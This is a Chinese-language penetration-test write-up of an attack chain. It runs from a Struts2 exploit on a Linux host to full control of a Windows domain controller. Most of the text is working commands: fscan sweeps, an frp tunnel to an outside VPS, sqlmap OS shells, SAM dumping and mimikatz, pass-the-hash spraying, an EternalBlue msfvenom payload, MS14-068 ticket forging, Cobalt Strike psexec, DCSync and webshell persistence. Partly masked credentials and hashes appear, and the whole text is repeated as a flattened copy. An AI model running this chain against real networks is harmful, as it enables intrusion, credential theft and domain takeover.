记一次从linux打进域控
字数 1031 2025-08-25 22:58:40

从Linux渗透到域控的完整攻击链分析

前言

本文详细记录了一次从Linux系统渗透进入Windows域环境的完整过程,涉及多种攻击技术和工具的使用,包括漏洞利用、横向移动、权限提升和域控攻击等关键环节。

初始入侵阶段

1. 通过Struts2漏洞获取初始访问

  • 识别Struts2框架
    • 检查网站后缀是否为.action
    • 抓包查看登录请求是否包含.action后缀
  • 利用工具:直接使用Struts2漏洞利用工具进行攻击
  • 权限维持:上传Webshell维持访问权限

2. 信息收集

在获取Linux服务器权限后,进行以下信息收集:

  • 检查历史命令记录
  • 查找数据库配置文件
  • 获取有效凭证: 
    kartxx/karxx
root/root
xxadmin/xx@m453

内网横向移动

3. 网络扫描

使用fscan进行内网扫描:

./fscan -h 192.168.1.126/16
./fscan -h 192.168.1.126/16 -m netbios

使用Python脚本整理扫描结果:

python fscan.py -i result.txt -o resu.txt

4. 建立代理通道

由于目标主机限制端口出网,使用非标准端口建立frp代理:

frps.ini配置:

[common]
bind_port = 8080

frpc.ini配置:

[common]
server_addr = vps地址
server_port = 8080
tcp_mux = true

[plugin_socks5]
type = tcp
remote_port = 8443
plugin = socks5

域环境渗透

5. 域信息收集

通过MySQL数据库获取域信息:

proxychains sqlmap -d "mysql://root:root@192.168.1.138:3306/mysql" --os-shell --random-agent

查询域管理信息:

net group "domain admins" /domain
net group "Domain Controllers" /domain

发现域控地址:

AD-server  192.168.1.5
star       192.168.1.6

6. 凭证获取技术

导出注册表并获取密码哈希:

reg save hklm\sam sam.hive
reg save hklm\system system.hive

本地使用mimikatz解析:

lsadump::sam /sam:sam.hive /system:system.hive

获取到的管理员哈希:

administrator/541ae40b283303b382a1ffxxxxx

7. 密码喷洒攻击

提取445开放主机:

fscan -h 192.168.1.0/16 -p 445
python tiqu.py -ii resu.txt 445

执行密码喷洒:

proxychains crackmapexec smb port.txt administrator -H 541ae40b283303b382axxxxxx

漏洞利用阶段

8. EternalBlue(MS17-010)利用

发现易受攻击主机:

[+] 192.168.1.6 MS17-010 (Windows Server 2008 R2 Standard 7601)
[+] 192.168.6.123 MS17-010 (Windows 7 Professional 7601 Service Pack 1)
[+] 192.168.5.112 has DOUBLEPULSAR SMB IMPLANT
[+] 192.168.5.110 has DOUBLEPULSAR SMB IMPLANT

添加路由:

run autoroute -s 192.168.1.0/16

生成payload:

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=10012 -f dll >64.dll

使用批处理脚本攻击:

check.bat 192.168.5.110
attack.bat 192.168.5.110 x64 64.dll

9. 使用Mimikatz获取凭证

load kiwi
kiwi_cmd sekurlsa::logonpasswords

获取的凭证:

xxxhistn:xxxx@123456
Admin:1000:aad3b435b51404eeaxxxxxxx:3dbde697d71690a769204bxxxxxxx:::
Administrator:500:aad3b435b51404eeaxxxxxx:541ae40b283303b382a1xxxxx:::

域控攻击

10. MS14-068漏洞利用

生成黄金票据:

proxychains python2 ms14-068.py -u 域用户@域名称 -p 密码 -s 域用户sid值 -d 192.168.1.6

注入票据:

kiwi_cmd "kerberos::ptc 1.ccache"

验证访问:

dir \\192.168.1.6\c$

11. 上线Cobalt Strike

  • 创建中转监听器
  • 使用psexec上线域控: 
    jump psexec 192.168.1.5 smb
jump psexec 192.168.1.6 smb

12. DCSync攻击

mimikatz lsadump::dcsync /domain:xxxxxftware.com /all /csv

权限维持与后渗透

13. 持久化方法

  • 在域控网站根目录放置Webshell
  • 进程注入防止掉线

14. 深度信息收集

DNS信息收集:

proxychains python3 dnsdump.py -u "xxxxx.com\administrator" -p 12345 192.168.1.6 -r

SPN扫描:

Setspn -Q */*

15. 域结构分析

查询组织单位:

dsquery ou

多网段渗透

发现目标存在多个网段(如172网段),通过检查域控的网络连接行为发现与其他网段的关联,为后续横向移动提供方向。

总结

本次渗透测试展示了从外部Linux系统到域控的完整攻击链,涉及:

  1. Web应用漏洞利用
  2. 内网代理建立
  3. 凭证获取与重用
  4. 经典漏洞利用(MS17-010, MS14-068)
  5. 域环境特权提升
  6. 权限维持技术

关键点在于充分利用获取的每一个凭证和信息,逐步扩大攻击面,最终完全控制域环境。

从Linux渗透到域控的完整攻击链分析 前言 本文详细记录了一次从Linux系统渗透进入Windows域环境的完整过程,涉及多种攻击技术和工具的使用,包括漏洞利用、横向移动、权限提升和域控攻击等关键环节。 初始入侵阶段 1. 通过Struts2漏洞获取初始访问 识别Struts2框架 : 检查网站后缀是否为 .action 抓包查看登录请求是否包含 .action 后缀 利用工具 :直接使用Struts2漏洞利用工具进行攻击 权限维持 :上传Webshell维持访问权限 2. 信息收集 在获取Linux服务器权限后,进行以下信息收集: 检查历史命令记录 查找数据库配置文件 获取有效凭证: 内网横向移动 3. 网络扫描 使用fscan进行内网扫描: 使用Python脚本整理扫描结果: 4. 建立代理通道 由于目标主机限制端口出网,使用非标准端口建立frp代理: frps.ini配置 : frpc.ini配置 : 域环境渗透 5. 域信息收集 通过MySQL数据库获取域信息: 查询域管理信息: 发现域控地址: 6. 凭证获取技术 导出注册表并获取密码哈希: 本地使用mimikatz解析: 获取到的管理员哈希: 7. 密码喷洒攻击 提取445开放主机: 执行密码喷洒: 漏洞利用阶段 8. EternalBlue(MS17-010)利用 发现易受攻击主机: 添加路由: 生成payload: 使用批处理脚本攻击: 9. 使用Mimikatz获取凭证 获取的凭证: 域控攻击 10. MS14-068漏洞利用 生成黄金票据: 注入票据: 验证访问: 11. 上线Cobalt Strike 创建中转监听器 使用psexec上线域控: 12. DCSync攻击 权限维持与后渗透 13. 持久化方法 在域控网站根目录放置Webshell 进程注入防止掉线 14. 深度信息收集 DNS信息收集: SPN扫描: 15. 域结构分析 查询组织单位: 多网段渗透 发现目标存在多个网段(如172网段),通过检查域控的网络连接行为发现与其他网段的关联,为后续横向移动提供方向。 总结 本次渗透测试展示了从外部Linux系统到域控的完整攻击链,涉及: Web应用漏洞利用 内网代理建立 凭证获取与重用 经典漏洞利用(MS17-010, MS14-068) 域环境特权提升 权限维持技术 关键点在于充分利用获取的每一个凭证和信息,逐步扩大攻击面,最终完全控制域环境。